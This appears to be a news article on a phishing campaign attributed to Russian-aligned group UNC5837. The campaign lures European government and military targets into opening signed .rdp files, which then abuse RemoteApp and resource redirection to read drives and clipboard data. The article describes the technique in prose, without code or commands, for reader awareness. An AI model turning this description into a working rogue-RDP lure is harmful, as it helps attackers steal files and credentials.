Disguised as a joint project between tech giants and a European government, one email can make your entire system a drive-thru for Kremlin-backed spies.
A quiet storm has hit European government and military networks – a phishing campaign attributed to a Russian-aligned threat actor group. The main goal here looks like classic spycraft – snooping and stealing files – but how deep the rabbit hole goes is still anyone’s guess.
The crooks, dubbed by Google Threat Intelligence Group (GTIG) as UNC5837, exploited a legitimate Windows service – Remote Desktop Protocol (RDP), which enables users to control and operate computers from a distance remotely.
Unlike typical RDP attacks where hackers take over your screen and start clicking around, this campaign played it smarter.
It used two lesser-known RDP features: resource redirection to map your files straight to their server and RemoteApps to sneak in an attacker-controlled app that looks like it belongs. No flashy takeover, just quiet access to the sensitive files.
Behind the scenes, the attackers were browsing the victim’s files, capturing clipboard data that might include sensitive credentials and siphoning off data, maybe even watching what they were typing.
How does the trick work?
Imagine getting an email that claims to be from a joint project between Amazon, Microsoft, and the Ukrainian government. Big logos, clean formatting, all very serious. No urgent password resets. Just a slick-sounding attachment called "AWS Secure Storage Connection Stability Test" – with the added assurance that if it glitches, don’t sweat it.
“An error report will be generated automatically,” it says.
The attachment is a digitally signed .rdp file, which seems quite normal in corporate environments. It's also signed with a Let’s Encrypt certificate, so your operational system gives it a big thumbs-up and suppresses any warning. Just double-click and go.
However, once you launch the file, your system initiates an outbound RDP session to a domain tied to the Let’s Encrypt certificate – which means your computer is the one making the connection. As there is no inbound traffic, a firewall does not fire any alerts.
The attackers didn’t just pop open a remote desktop window so as not to be too obvious. Instead, they use RemoteApp, a lesser-known RDP feature that displays a single window.
In this case, a generic-looking utility titled “AWS Secure Storage Connection Stability Test.” However, this window is actually running from the threat actor’s server.
As long as that RDP session is live, the attackers are plugged directly into your system’s arteries. RDP configuration in the file hands over read and write access to all of your local drives, plus your clipboard, which often is stacked with passwords, notes, crypto wallet keys, and loads of other sensitive information.
It also enables access to printers, ports, smartcards, and audio devices rerouting the data into the attacker’s hands like they’re sitting right next to you.
This whole operation hinges on a built-in Microsoft feature called resource redirection, which uses “virtual channels” to sync hardware between the victim and attacker machines.
Digging deeper, indicators suggest the threat actors likely used PyRDP, an open-source RDP proxy. This technique has been previously dubbed “Rogue RDP.” PyRDP is tailor-made for this kind of silent heist – letting attackers intercept RDP sessions, record everything, and scrape off anything juicy.
RDPs are vulnerable to attacks
Google’s GTIG indicates that the phishing campaign was identified in October 2024.
The campaign of mass-distributed emails with.rdp file attachments has been previously reported by the Computer Emergency Response Team of Ukraine (CERT-UA), TrendMicro, and Amazon.
At the same time, Microsoft warned of Russian threat actor Cozy Bear, which unleashed a similar campaign, targeting over 100 organizations in critical sectors.
The attackers send carefully crafted emails to trick users into opening a Remote Desktop Protocol (RDP) configuration file, leading to compromise.
Report by a cybersecurity platform Malwarebytes claims 58% of ransomware attacks dealt with by the company began with an RDP intrusion.
Your email address will not be published. Required fields are markedmarked